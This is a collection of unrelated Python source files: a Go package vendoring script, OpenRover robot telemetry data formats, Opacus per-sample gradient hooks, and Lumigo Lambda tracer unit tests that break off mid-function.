addConfig( vendorDirectory, config )
"""
Build Package
Will Build Each Package in the directory required by the config file.
Will Ensure the path is unuinqe and then build the file and copy all the
go files from the build source over.
"""
def buildPackages( vendorDirectory, sourceDirectory, config ):
if "packages" in config:
for package in config[ "packages" ]:
buildPath = os.path.join( vendorDirectory, package[ "name" ] )
sourcePath = os.path.join( sourceDirectory, package[ "path" ] )
if os.path.isdir( buildPath ):
print( """Error: Unable to build package {}, as the build
name is not unique."""
.format( package[ "name" ] ) )
continue
os.mkdir( buildPath )
if not os.path.isdir( sourcePath ):
print( """Error: Unable to build package {}, as the source
directory, \"{}\" does not exist."""
.format( package[ "name" ], sourcePath ) )
continue
files = glob.iglob( os.path.join( sourcePath, "*.go" ) )
for file in files:
if os.path.isfile( file ):
shutil.copy2( file, buildPath )
# Build Config
def build():
configFile = os.path.join( os.getcwd(), CONFIG_NAME )
sourceDirectory = os.path.dirname( configFile )
with open( configFile ) as data: config = json.load( data )
vendorDirectory = os.path.join( GO_PATH, config[ "vendor" ] )
prepareVenderDirectory( vendorDirectory, sourceDirectory, config )
buildPackages( vendorDirectory, sourceDirectory, config )
# Setup
def main(args=None):
description = "Bubble Gom (v{}) by Sellers Industry".format( VERSION )
parser = argparse.ArgumentParser( description=description, add_help=False )
# Version Number
subparsers = parser.add_subparsers( help="Commands", dest='command' )
# Commands
parser_help = subparsers.add_parser( "help", help="help documents" )
parser_version = subparsers.add_parser( "version", help="version of Bubble Gom" )
parser_build = subparsers.add_parser( "build", help="Build from config file" )
args = parser.parse_args()
# Run Commands
if args.command == "help":
parser.print_help()
elif args.command == "version":
print( description )
elif args.command == "build":
build()
else:
print( "Command unknown try \"gom help\"" )
if __name__ == "__main__":
sys.exit( main() ) |
<reponame>RoverRobotics/openrover_python
import abc
import enum
import functools
import re
from typing import NamedTuple, Optional
class ReadDataFormat(abc.ABC):
python_type = None
@abc.abstractmethod
def description(self):
raise NotImplementedError
@abc.abstractmethod
def unpack(self, b: bytes):
raise NotImplementedError
class WriteDataFormat(abc.ABC):
python_type = None
@abc.abstractmethod
def description(self):
raise NotImplementedError
@abc.abstractmethod
def pack(self, value) -> bytes:
raise NotImplementedError
class IntDataFormat(ReadDataFormat, WriteDataFormat):
def __init__(self, nbytes, signed):
self.nbytes = nbytes
self.signed = signed
def description(self):
s = "signed" if self.signed else "unsigned"
n = self.nbytes * 8
return f"{s} integer ({n} bits)"
def pack(self, value):
return int(value).to_bytes(self.nbytes, byteorder="big", signed=self.signed)
def unpack(self, b: bytes):
return int.from_bytes(b, byteorder="big", signed=self.signed)
ROVER_LEGACY_VERSION = 40621
@functools.total_ordering
class RoverFirmwareVersion(NamedTuple):
@classmethod
def parse(cls, a_str):
ver_re = re.compile(r"(\d+(?:[.]\d+){0,2})(?:-([^+])+)?(?:[+](.+))?", re.VERBOSE)
match = ver_re.fullmatch(a_str)
if match is None:
raise ValueError
parts = [int(p) for p in match.group(0).split(".")]
return RoverFirmwareVersion(*parts)
major: int
minor: int = 0
patch: int = 0
build: str = ""
prerelease: str = ""
@property
def value(self):
return self.major * 10000 + self.minor * 100 + self.patch * 10
def __lt__(self, other):
return (self.major, self.minor, self.patch, other.prerelease) < (
other.major,
other.minor,
other.patch,
self.prerelease,
)
def __str__(self):
return (
f"{self.major}.{self.minor}.{self.patch}"
+ (("-" + self.prerelease) if self.prerelease else "")
+ (("+" + self.build) if self.build else "")
)
class DataFormatFirmwareVersion(ReadDataFormat):
python_type = RoverFirmwareVersion
def unpack(self, b):
v = UINT16.unpack(b)
if v == ROVER_LEGACY_VERSION:
return RoverFirmwareVersion(1, 0, 0)
return RoverFirmwareVersion(v // 10000, v // 100 % 100, v % 10)
def description(self):
return (
"XYYZZ, where X=major version, Y=minor version, Z = patch version."
"e.g. 10502 = version 1.05.02. The special value 16421 represents pre-1.3 versions"
)
class DataFormatChargerState(ReadDataFormat, WriteDataFormat):
CHARGER_ACTIVE_MAGIC_BYTES = bytes.fromhex("dada")
CHARGER_INACTIVE_MAGIC_BYTES = bytes.fromhex("0000")
python_type = bool
def pack(self, value):
if value:
return self.CHARGER_ACTIVE_MAGIC_BYTES
else:
return self.CHARGER_INACTIVE_MAGIC_BYTES
def unpack(self, b):
return bytes(b) == self.CHARGER_ACTIVE_MAGIC_BYTES
def description(self):
return "0xDADA if charging, else 0x0000"
class BatteryStatus(enum.Flag):
overcharged_alarm = enum.auto()
terminate_charge_alarm = enum.auto()
over_temp_alarm = enum.auto()
terminate_discharge_alarm = enum.auto()
remaining_capacity_alarm = enum.auto()
remaining_time_alarm = enum.auto()
initialized = enum.auto()
discharging = enum.auto()
fully_charged = enum.auto()
fully_discharged = enum.auto()
class DataFormatBatteryStatus(ReadDataFormat):
python_type = BatteryStatus
def unpack(self, b: bytes):
assert len(b) == 2
as_int = int.from_bytes(b, byteorder="big", signed=False)
result = BatteryStatus(0)
for mask, val in (
(0x8000, BatteryStatus.overcharged_alarm),
(0x4000, BatteryStatus.terminate_charge_alarm),
(0x1000, BatteryStatus.over_temp_alarm),
(0x0800, BatteryStatus.terminate_discharge_alarm),
(0x0200, BatteryStatus.remaining_capacity_alarm),
(0x0100, BatteryStatus.remaining_time_alarm),
(0x0080, BatteryStatus.initialized),
(0x0040, BatteryStatus.discharging),
(0x0020, BatteryStatus.fully_charged),
(0x0010, BatteryStatus.fully_discharged),
):
if as_int & mask:
result |= val
return result
def description(self):
return "bit flags"
class DriveMode(enum.IntEnum):
OPEN_LOOP = 0
CLOSED_LOOP = 1
UINT16 = IntDataFormat(2, False)
INT16 = IntDataFormat(2, True)
UINT8 = IntDataFormat(1, signed=False)
class DataFormatFixedPrecision(ReadDataFormat, WriteDataFormat):
"""A fractional number packed as an integer, but representing a fractional number"""
def __init__(self, base_type, step=1.0, zero=0.0):
self.base_type = base_type
# a change of 1 in the python type corresponds to a change of this many in the base type
self.step = step
# the value of 0 in the python type corresponds to this value in the base type
self.zero = zero
def unpack(self, b: bytes):
n = self.base_type.unpack(b)
return (n - self.zero) / self.step
def pack(self, p):
n = round(p * self.step + self.zero)
return self.base_type.pack(n)
def description(self):
return "fractional (resolution=1/{}, zero={}) stored as {}".format(
self.step, self.zero, self.base_type.description()
)
class DataFormatDriveMode(ReadDataFormat):
python_type = DriveMode
def unpack(self, b: bytes):
return DriveMode(UINT16.unpack(b))
def pack(self, p: DriveMode):
return UINT16.pack(p.value)
def description(self):
return DriveMode.__doc__
OLD_CURRENT_FORMAT = DataFormatFixedPrecision(UINT16, 34)
SIGNED_MILLIS_FORMAT = DataFormatFixedPrecision(INT16, 1000)
UNSIGNED_MILLIS_FORMAT = DataFormatFixedPrecision(UINT16, 1000)
OLD_VOLTAGE_FORMAT = DataFormatFixedPrecision(UINT16, 58)
FAN_SPEED_RESPONSE_FORMAT = DataFormatFixedPrecision(UINT16, 240)
DECIKELVIN_FORMAT = DataFormatFixedPrecision(UINT16, 10, zero=2731.5)
PERCENTAGE_FORMAT = DataFormatFixedPrecision(UINT16, 100)
MOTOR_EFFORT_FORMAT = DataFormatFixedPrecision(UINT8, 125, 125)
CHARGER_STATE_FORMAT = DataFormatChargerState()
FIRMWARE_VERSION_FORMAT = DataFormatFirmwareVersion()
DRIVE_MODE_FORMAT = DataFormatDriveMode()
BATTERY_STATUS_FORMAT = DataFormatBatteryStatus()
class MotorStatusFlag(enum.Flag):
NONE = 0
FAULT1 = enum.auto()
FAULT2 = enum.auto()
DECAY_MODE = enum.auto()
REVERSE = enum.auto()
BRAKE = enum.auto()
COAST = enum.auto()
class DataFormatMotorStatus(ReadDataFormat):
def description(self):
return "motor status bit flags"
def unpack(self, b: bytes):
u = UINT16.unpack(b)
bit_meanings = [
MotorStatusFlag.FAULT1,
MotorStatusFlag.FAULT2,
MotorStatusFlag.DECAY_MODE,
MotorStatusFlag.REVERSE,
MotorStatusFlag.BRAKE,
MotorStatusFlag.COAST,
]
if len(bit_meanings) <= u.bit_length():
raise ValueError("too many bits to unpack")
result = MotorStatusFlag.NONE
for i, flag in enumerate(bit_meanings):
if u & 1 << i:
result |= flag
return result
class DataFormatIgnored(WriteDataFormat):
def description(self):
return f"Ignored data {self.n_bytes} bytes long"
def pack(self, value=None) -> bytes:
assert value is None
return bytes(self.n_bytes)
def __init__(self, n_bytes):
self.n_bytes = n_bytes
class SystemFaultFlag(enum.Flag):
NONE = 0
OVERSPEED = enum.auto()
OVERCURRENT = enum.auto()
class DataFormatSystemFault(ReadDataFormat):
def description(self):
return "System fault bit flags"
def unpack(self, b: bytes):
u = UINT16.unpack(b)
bit_meanings = [SystemFaultFlag.OVERSPEED, SystemFaultFlag.OVERCURRENT]
if len(bit_meanings) <= u.bit_length():
raise ValueError("too many bits to unpack")
result = SystemFaultFlag.NONE
for i, flag in enumerate(bit_meanings):
if u & 1 << i:
result |= flag
return result
class DataElement:
def __init__(
self,
index: int,
data_format: ReadDataFormat,
name: str,
description: str = None,
not_implemented: bool = False,
since: Optional[str] = None,
until: Optional[str] = None,
):
self.index = index
self.data_format = data_format
self.name = name
self.description = description
self.not_implemented = not_implemented
self.since_version = None if since is None else RoverFirmwareVersion.parse(since)
self.until_version = None if until is None else RoverFirmwareVersion.parse(until)
def supported(self, version):
if isinstance(version, str):
v = RoverFirmwareVersion.parse(version)
elif isinstance(version, RoverFirmwareVersion):
v = version
else:
raise TypeError(
f"Expected string or {type(RoverFirmwareVersion)}, but got {type(version)}"
)
if self.not_implemented:
return False
if self.since_version is not None and v < self.since_version:
return False
if self.until_version is not None:
if self.until_version <= v:
return False
return True
elements = [
DataElement(
0, OLD_CURRENT_FORMAT, "battery (A+B) current (external)", "total current from batteries"
),
DataElement(2, UINT16, "left motor speed", not_implemented=True),
DataElement(4, UINT16, "right motor speed", not_implemented=True),
DataElement(
6,
UINT16,
"flipper position 1",
"flipper position sensor 1. 0=15 degrees; 1024=330 degrees;",
),
DataElement(
8,
UINT16,
"flipper position 2",
"flipper position sensor 2. 0=15 degrees; 1024=330 degrees;",
),
DataElement(10, OLD_CURRENT_FORMAT, "left motor current"),
DataElement(12, OLD_CURRENT_FORMAT, "right motor current"),
DataElement(
14,
UINT16,
"left motor encoder count",
"May overflow or underflow. Increments when motor driven forward, decrements backward",
since="1.4",
),
DataElement(
16,
UINT16,
"right motor encoder count",
"May overflow or underflow. Increments when motor driven forward, decrements backward",
since="1.4",
),
DataElement(18, UINT16, "motors fault flag", not_implemented=True),
DataElement(20, UINT16, "left motor temperature"),
DataElement(22, UINT16, "right motor temperature", not_implemented=True),
DataElement(24, OLD_VOLTAGE_FORMAT, "battery A voltage (external)"),
DataElement(26, OLD_VOLTAGE_FORMAT, "battery B voltage (external)"),
DataElement(
28,
UINT16,
"left motor encoder interval",
"0 when motor stopped. Else proportional to motor period (inverse motor speed)",
),
DataElement(
30,
UINT16,
"right motor encoder interval",
"0 when motor stopped. Else proportional to motor period (inverse motor speed)",
),
DataElement(
32,
UINT16,
"flipper motor encoder interval",
"0 when motor stopped. Else proportional to motor period (inverse motor speed)",
not_implemented=True,
),
DataElement(
34,
PERCENTAGE_FORMAT,
"battery A state of charge",
"Proportional charge, 0.0=empty, 1.0=full",
),
DataElement(
36,
PERCENTAGE_FORMAT,
"battery B state of charge",
"Proportional charge, 0.0=empty, 1.0=full",
),
DataElement(38, CHARGER_STATE_FORMAT, "battery charging state"),
DataElement(40, FIRMWARE_VERSION_FORMAT, "release version"),
DataElement(42, OLD_CURRENT_FORMAT, "battery A current (external)"),
DataElement(44, OLD_CURRENT_FORMAT, "battery B current (external)"),
DataElement(46, UINT16, "motor flipper angle"),
DataElement(48, FAN_SPEED_RESPONSE_FORMAT, "fan speed"),
DataElement(50, DRIVE_MODE_FORMAT, "drive mode", until="1.7"),
DataElement(52, BATTERY_STATUS_FORMAT, "battery A status", since="1.2"),
DataElement(54, BATTERY_STATUS_FORMAT, "battery B status", since="1.2"),
DataElement(56, UINT16, "battery A mode", since="1.2"),
DataElement(58, UINT16, "battery B mode", since="1.2"),
DataElement(60, DECIKELVIN_FORMAT, "battery A temperature (internal)", since="1.2"),
DataElement(62, DECIKELVIN_FORMAT, "battery B temperature (internal)", since="1.2"),
DataElement(64, UNSIGNED_MILLIS_FORMAT, "battery A voltage (internal)", since="1.2"),
DataElement(66, UNSIGNED_MILLIS_FORMAT, "battery B voltage (internal)", since="1.2"),
DataElement(
68,
SIGNED_MILLIS_FORMAT,
"battery A current (internal)",
">0 = charging; <0 = discharging",
since="1.2",
),
DataElement(
70,
SIGNED_MILLIS_FORMAT,
"battery B current (internal)",
">0 = charging; <0 = discharging",
since="1.2",
),
DataElement(72, DataFormatMotorStatus(), "left motor status", since="1.7"),
DataElement(74, DataFormatMotorStatus(), "right motor status", since="1.7"),
DataElement(76, DataFormatMotorStatus(), "flipper motor status", since="1.7"),
DataElement(78, FAN_SPEED_RESPONSE_FORMAT, "fan 1 duty", since="1.9"),
DataElement(80, FAN_SPEED_RESPONSE_FORMAT, "fan 2 duty", since="1.9"),
DataElement(82, DataFormatSystemFault(), "system fault flags", since="1.10"),
]
ROVER_DATA_ELEMENTS = {e.index: e for e in elements}
def strike(s):
return f"~~{s}~~"
def doc():
lines = ["| # | Name | Data Type | Description |", "| - | ---- | --------- | ----------- |"]
for de in elements:
lines.append(
"|"
+ "|".join(
[
strike(de.index) if de.not_implemented else de.index,
de.name,
de.data_format.description(),
de.description,
]
)
+ "|"
)
return "\n".join(lines)
if __name__ == "__main__":
print(doc())
def fix_encoder_delta(delta):
MAX_ENCODER = 2 ** 16
delta %= MAX_ENCODER
if delta < MAX_ENCODER / 2:
return delta
else:
return delta - MAX_ENCODER
|
<reponame>anibadde/opacus
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from functools import partial
from typing import Iterable, List, Tuple
import torch
import torch.nn as nn
from opacus.layers.dp_rnn import DPRNNBase, DPRNNCellBase, RNNLinear
from opacus.utils.module_inspection import requires_grad
class UnsupportedModuleError(ValueError):
pass
class GradSampleModule(nn.Module):
r"""
Extends nn.Module so that its parameter tensors have an extra field called .grad_sample.
"""
GRAD_SAMPLERS = {}
def __init__(self, m: nn.Module, *, batch_first=True, loss_reduction="mean"):
super().__init__()
self._module = m
self.hooks_enabled = False
self.batch_first = batch_first
self.loss_reduction = loss_reduction
self.add_hooks(loss_reduction=loss_reduction, batch_first=batch_first)
def forward(self, x):
return self._module(x)
def zero_grad(self):
self.del_grad_sample()
super().zero_grad()
def del_grad_sample(self):
"""
Deletes ``.grad_sample`` from this module's parameters.
Why del? Normally, ``zero_grad()`` would do ``p.grad.zero_()`` and keep the allocation.
Normal grads can do this, because their shape is always the same.
Grad samples do not behave like this, because they accumulate over the batch dim.
If you have ``batch_size=32`` and size (12, 16) and you backprop twice, you should
expect to have grad_samples of size [64, 12, 16]. If you backprop once more,
then you'll get size [96, 12, 16] and so on.
So when you zero out, you should be left with nothing so you can start over.
"""
for p in self.parameters():
if hasattr(p, "grad_sample") and p.grad_sample is not None:
if p.grad_sample.grad_fn is not None:
p.grad_sample.detach_()
else:
p.grad_sample.requires_grad_(False)
del p.grad_sample
def to_standard_module(self) -> nn.Module:
"""
Returns the standard nn.Module wrapped by this, eliminating all traces
of grad samples and hooks
Returns:
The wrapped module
"""
self._close()
return self._module
def add_hooks(self, loss_reduction: str = "mean", batch_first: bool = True) -> None:
"""
Adds hooks to model to save activations and backprop values.
The hooks will
1. save activations into param.activations during forward pass
2. compute per-sample gradients in params.grad_sample during backward pass.
Call ``remove_hooks(model)`` to disable this.
Args:
model: the model to which hooks are added
loss_type: either "mean" or "sum" depending on whether backpropped
loss was averaged or summed over batch (default: "mean")
batch_dim: the batch dimension (default: 0)
"""
if hasattr(self._module, "autograd_grad_sample_hooks"):
raise ValueError("Trying to add hooks twice to the same model")
else:
self._module.autograd_grad_sample_hooks = []
self.autograd_grad_sample_hooks = self._module.autograd_grad_sample_hooks
for module in self.trainable_modules():
if type(module) in self.GRAD_SAMPLERS:
self.autograd_grad_sample_hooks.append(
module.register_forward_hook(self.capture_activations_hook)
)
self.autograd_grad_sample_hooks.append(
module.register_backward_hook(
partial(
self.capture_backprops_hook,
loss_reduction=loss_reduction,
batch_first=batch_first,
)
)
)
self.enable_hooks()
def remove_hooks(self) -> None:
"""
Removes hooks added by ``add_hooks()``
"""
self.disable_hooks()
if hasattr(self, "ddp_hooks"):
while self.ddp_hooks:
handle = self.ddp_hooks.pop()
handle.remove()
delattr(self, "ddp_hooks")
if not hasattr(self, "autograd_grad_sample_hooks"):
raise ValueError("Asked to remove hooks, but no hooks found")
else:
while self.autograd_grad_sample_hooks:
handle = self.autograd_grad_sample_hooks.pop()
handle.remove()
delattr(self, "autograd_grad_sample_hooks")
delattr(self._module, "autograd_grad_sample_hooks")
def disable_hooks(self) -> None:
r"""
Globally disable all hooks installed by this library.
Why is this needed? As per https://github.com/pytorch/pytorch/issues/25723, there is
a bug in Autograd that makes removing hooks do nothing if the graph was already
constructed. For this reason, we have this method to at least turn them off.
"""
self.hooks_enabled = False
def enable_hooks(self) -> None:
r"""
The opposite of ``disable_hooks()``. Hooks are always enabled unless you explicitly
disable them so you don't need to call this unless you want to re-enable them.
"""
self.hooks_enabled = True
def parametrized_modules(self) -> Iterable[nn.Module]:
"""
Recursively iterates over all submodules, returning those that
have parameters (as opposed to "wrapper modules" that just organize modules).
"""
yield from (
m
for m in self._module.modules()
if any(p is not None for p in m.parameters(recurse=False))
)
def trainable_modules(self) -> Iterable[nn.Module]:
"""
Recursively iterates over all submodules, returning those that
have parameters and are trainable (ie they want a grad).
"""
yield from (
m
for m in self.parametrized_modules()
if any(p.requires_grad for p in m.parameters())
)
def __repr__(self):
return f"GradSample({self._module.__repr__()})"
def _close(self):
self.del_grad_sample()
self.remove_hooks()
def capture_activations_hook(
self,
module: nn.Module,
forward_input: List[torch.Tensor],
_forward_output: torch.Tensor,
):
if (
not requires_grad(module)
or not module.training
or not torch.is_grad_enabled()
):
return
if not self.hooks_enabled:
return
if not hasattr(module, "activations"):
module.activations = []
module.activations.append(forward_input[0].detach()) # pyre-ignore
def capture_backprops_hook(
self,
module: nn.Module,
_forward_input: torch.Tensor,
forward_output: torch.Tensor,
loss_reduction: str,
batch_first: bool,
):
"""Captures backprops in backward pass and store per-sample gradients."""
if not self.hooks_enabled:
return
backprops = forward_output[0].detach()
activations, backprops = self.rearrange_grad_samples(
module, backprops, loss_reduction, batch_first
)
grad_sampler_fn = self.GRAD_SAMPLERS[type(module)]
grad_sampler_fn(module, activations, backprops)
if (
not isinstance(module.activations, list) or len(module.activations) == 0
) and hasattr(module, "max_batch_len"):
del module.max_batch_len
def rearrange_grad_samples(
self,
module: nn.Module,
backprops: torch.Tensor,
loss_reduction: str,
batch_first: bool,
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Rearrange activations and grad_samples based on loss reduction and batch dim
Args:
module: the module for which per-sample gradients are computed
backprops: the captured backprops
loss_reduction: either "mean" or "sum" depending on whether backpropped
loss was averaged or summed over batch
batch_first: True is batch dimension is first
"""
if not hasattr(module, "activations"):
raise ValueError(
f"No activations detected for {type(module)},"
" run forward after add_hooks(model)"
)
batch_dim = 0 if batch_first or type(module) is RNNLinear else 1
if isinstance(module.activations, list):
A = module.activations.pop()
else:
A = module.activations
if not hasattr(module, "max_batch_len"):
# For packed sequences, max_batch_len is set in the forward of the model (e.g. the LSTM)
# Otherwise we infer it here
module.max_batch_len = _get_batch_size(module, A, batch_dim)
n = module.max_batch_len
if loss_reduction == "mean":
B = backprops * n
elif loss_reduction == "sum":
B = backprops
else:
raise ValueError(
f"loss_reduction = {loss_reduction}. Only 'sum' and 'mean' losses are supported"
)
# No matter where the batch dimension was, .grad_samples will *always* put it in the first dim
if batch_dim != 0:
A = A.permute([batch_dim] + [x for x in range(A.dim()) if x != batch_dim])
B = B.permute([batch_dim] + [x for x in range(B.dim()) if x != batch_dim])
return A, B
@classmethod
def is_supported(cls, module: nn.Module) -> bool:
"""Check if this module is supported"""
return type(module) in cls.GRAD_SAMPLERS or isinstance(
module, (DPRNNBase, DPRNNCellBase)
)
def _get_batch_size(
module: nn.Module, grad_sample: torch.Tensor, batch_dim: int
) -> int:
r"""
Computes and returns the maximum batch size which is the maximum of the dimension values
along 'batch_dim' axis over module.activations + [grad_sample], where module.activations is
a list. If module.activations is a not a list, then return grad_sample.shape[batch_dim].
"""
max_batch_len = 0
if isinstance(module.activations, list):
for out in module.activations:
if out.shape[batch_dim] > max_batch_len:
max_batch_len = out.shape[batch_dim]
max_batch_len = max(max_batch_len, grad_sample.shape[batch_dim])
return max_batch_len
|
<gh_stars>0
import datetime
import json
import time
import os
import sys
import urllib
from functools import wraps
from io import BytesIO
from types import SimpleNamespace
import logging
from typing import Dict
import urllib3
from capturer import CaptureOutput
from lumigo_tracer import lumigo_tracer, LumigoChalice, utils, add_execution_tag
from lumigo_tracer.auto_tag import auto_tag_event
from lumigo_tracer.parsers.parser import Parser
import http.client
from lumigo_tracer.utils import (
Configuration,
STEP_FUNCTION_UID_KEY,
LUMIGO_EVENT_KEY,
_create_request_body,
EXECUTION_TAGS_KEY,
)
import pytest
from lumigo_tracer.spans_container import SpansContainer
def test_lambda_wrapper_basic_events(reporter_mock):
"""
This test checks that the basic events (start and end messages) has been sent.
"""
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
pass
lambda_test_function()
function_span = SpansContainer.get_span().function_span
assert not SpansContainer.get_span().http_spans
assert "started" in function_span
assert "ended" in function_span
assert reporter_mock.call_count == 2
first_send = reporter_mock.call_args_list[0][1]["msgs"]
assert len(first_send) == 1
assert first_send[0]["id"].endswith("_started")
assert first_send[0]["maxFinishTime"]
@pytest.mark.parametrize("exc", [ValueError("Oh no"), ValueError(), ValueError(Exception())])
def test_lambda_wrapper_exception(exc):
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
a = "A" # noqa
raise exc
try:
lambda_test_function()
except ValueError:
pass
else:
assert False
function_span = SpansContainer.get_span().function_span
assert not SpansContainer.get_span().http_spans
assert function_span.get("error", {}).get("type") == "ValueError"
# Make sure no lumigo_tracer
assert len(function_span["error"]["frames"]) == 1
assert function_span["error"]["frames"][0].pop("lineno") > 0
assert function_span["error"]["frames"][0] == {
"function": "lambda_test_function",
"fileName": __file__,
"variables": {"a": "A", "exc": str(exc)},
}
assert not function_span["id"].endswith("_started")
assert "reporter_rtt" in function_span
assert "maxFinishTime" not in function_span
# Test that we can create an output message out of this span
assert _create_request_body([function_span], prune_size_flag=False)
def test_lambda_wrapper_http():
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
time.sleep(0.01)
http.client.HTTPConnection("www.google.com").request("POST", "/")
lambda_test_function()
http_spans = SpansContainer.get_span().http_spans
assert http_spans
assert http_spans[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
assert "started" in http_spans[0]
assert http_spans[0]["started"] > SpansContainer.get_span().function_span["started"]
assert "ended" in http_spans[0]
assert "content-length" in http_spans[0]["info"]["httpInfo"]["request"]["headers"]
def test_lambda_wrapper_query_with_http_params():
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
http.client.HTTPConnection("www.google.com").request("GET", "/?q=123")
lambda_test_function()
http_spans = SpansContainer.get_span().http_spans
assert http_spans
print(http_spans[0]["info"]["httpInfo"]["request"])
assert http_spans[0]["info"]["httpInfo"]["request"]["uri"] == "www.google.com/?q=123"
def test_lambda_wrapper_get_response():
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
conn = http.client.HTTPConnection("www.google.com")
conn.request("GET", "")
conn.getresponse()
lambda_test_function()
http_spans = SpansContainer.get_span().http_spans
assert http_spans
assert http_spans[0]["info"]["httpInfo"]["response"]["statusCode"] == 200
def test_lambda_wrapper_http_splitted_send():
"""
This is a test for the specific case of requests, where they split the http requests into headers and body.
We didn't use directly the package requests in order to keep the dependencies small.
"""
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
conn = http.client.HTTPConnection("www.google.com")
conn.request("POST", "/", b"123")
conn.send(BytesIO(b"456"))
lambda_test_function()
http_spans = SpansContainer.get_span().http_spans
assert http_spans
assert http_spans[0]["info"]["httpInfo"]["request"]["body"] == "123456"
assert "content-length" in http_spans[0]["info"]["httpInfo"]["request"]["headers"]
def test_lambda_wrapper_no_headers():
@lumigo_tracer(token="123")
def lambda_test_function():
http.client.HTTPConnection("www.google.com").send(BytesIO(b"123"))
lambda_test_function()
http_events = SpansContainer.get_span().http_spans
assert len(http_events) == 1
assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
assert "started" in http_events[0]
assert "ended" in http_events[0]
def test_lambda_wrapper_http_non_splitted_send():
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
http.client.HTTPConnection("www.google.com").request("POST", "/")
http.client.HTTPConnection("www.github.com").send(BytesIO(b"123"))
lambda_test_function()
http_events = SpansContainer.get_span().http_spans
assert len(http_events) == 2
def test_kill_switch(monkeypatch):
monkeypatch.setattr(os, "environ", {"LUMIGO_SWITCH_OFF": "true"})
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
return 1
assert lambda_test_function() == 1
assert not SpansContainer._span
def test_wrapping_exception(monkeypatch):
monkeypatch.setattr(SpansContainer, "create_span", lambda x: 1 / 0)
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
return 1
assert lambda_test_function() == 1
assert not SpansContainer._span
def test_wrapping_with_parameters():
@lumigo_tracer(should_report="123")
def lambda_test_function():
return 1
assert lambda_test_function() == 1
assert Configuration.should_report == "123"
def test_bad_domains_scrubber(monkeypatch):
monkeypatch.setenv("LUMIGO_DOMAINS_SCRUBBER", '["bad json')
@lumigo_tracer(token="123", should_report=True)
def lambda_test_function():
pass
lambda_test_function()
assert utils.Configuration.should_report is False
def test_domains_scrubber_happy_flow(monkeypatch):
@lumigo_tracer(token="<PASSWORD>", domains_scrubber=[".*google.*"])
def lambda_test_function():
return http.client.HTTPConnection(host="www.google.com").send(b"\r\n")
lambda_test_function()
http_events = SpansContainer.get_span().http_spans
assert len(http_events) == 1
assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
assert "headers" not in http_events[0]["info"]["httpInfo"]["request"]
assert http_events[0]["info"]["httpInfo"]["request"]["body"] == "The data is not available"
def test_domains_scrubber_override_allows_default_domains(monkeypatch):
ssm_url = "www.ssm.123.amazonaws.com"
@lumigo_tracer(token="<PASSWORD>", domains_scrubber=[".*google.*"])
def lambda_test_function():
try:
return http.client.HTTPConnection(host=ssm_url).send(b"\r\n")
except Exception:
return
lambda_test_function()
http_events = SpansContainer.get_span().http_spans
assert len(http_events) == 1
assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == ssm_url
assert http_events[0]["info"]["httpInfo"]["request"]["headers"]
def test_wrapping_with_print_override():
@lumigo_tracer(enhance_print=True)
def lambda_test_function(event, context):
print("hello\nworld")
return 1
with CaptureOutput() as capturer:
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
assert Configuration.enhanced_print is True
assert "RequestId: 1234 hello" in capturer.get_lines()
assert "RequestId: 1234 world" in capturer.get_lines()
def test_wrapping_without_print_override():
@lumigo_tracer()
def lambda_test_function(event, context):
print("hello")
return 1
with CaptureOutput() as capturer:
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
assert Configuration.enhanced_print is False
assert any(line == "hello" for line in capturer.get_lines())
def test_wrapping_json_request():
@lumigo_tracer()
def lambda_test_function():
urllib.request.urlopen(
urllib.request.Request(
"http://api.github.com", b"{}", headers={"Content-Type": "application/json"}
)
)
return 1
assert lambda_test_function() == 1
http_events = SpansContainer.get_span().http_spans
assert any(
'"content-type": "application/json"'
in event.get("info", {}).get("httpInfo", {}).get("request", {}).get("headers", "")
for event in http_events
)
def test_exception_in_parsers(monkeypatch, caplog):
monkeypatch.setattr(Parser, "parse_request", Exception)
@lumigo_tracer(token="<PASSWORD>")
def lambda_test_function():
return http.client.HTTPConnection(host="www.google.com").send(b"\r\n")
lambda_test_function()
assert caplog.records[-1].msg == "An exception occurred in lumigo's code add request event"
def test_lumigo_chalice():
class App:
@property
def a(self):
return "a"
def b(self):
return "b"
def __call__(self, *args, **kwargs):
return "c"
app = App()
app = LumigoChalice(app)
# should not use lumigo's wrapper
assert app.a == "a"
assert app.b() == "b"
assert not SpansContainer._span
# should create a new span (but return the original value)
assert app() == "c"
assert SpansContainer._span
def test_lumigo_chalice_create_extra_lambdas(monkeypatch):
# mimic aws env
monkeypatch.setitem(os.environ, "LAMBDA_RUNTIME_DIR", "true")
class Chalice:
"""
This class in a mimic of chalice.
"""
touched = False
@staticmethod
def on_s3_event(**kwargs):
Chalice.touched = True # represents chalice's global analysis (in the deploy process)
def _create_registration_function(func):
@wraps(func)
def user_lambda_handler(*args, **kwargs):
return func(*args, **kwargs)
return user_lambda_handler
return _create_registration_function
app = Chalice()
app = LumigoChalice(app)
@app.on_s3_event(name="test")
def handler(event, context):
return "hello world"
# should run the outer code before lambda execution, but not create span (in global execution)
assert app.touched
assert not SpansContainer._span
# should create a new span (but return the original value)
assert handler({}, {}) == "hello world"
assert SpansContainer._span
def test_wrapping_with_logging_override_default_usage(caplog):
@lumigo_tracer(enhance_print=True)
def lambda_test_function(event, context):
logging.warning("hello\nworld")
return 1
assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
assert Configuration.enhanced_print is True
assert any("RequestId: 1234" in line and "hello" in line for line in caplog.text.split("\n"))
assert any("RequestId: 1234" in line and "world" in line for line in caplog.text.split("\n"))
def test_wrapping_with_logging_exception(caplog):
@lumigo_tracer(enhance_print=True)
def lambda_test_function(event, context):
logger = logging.getLogger("logger_name")
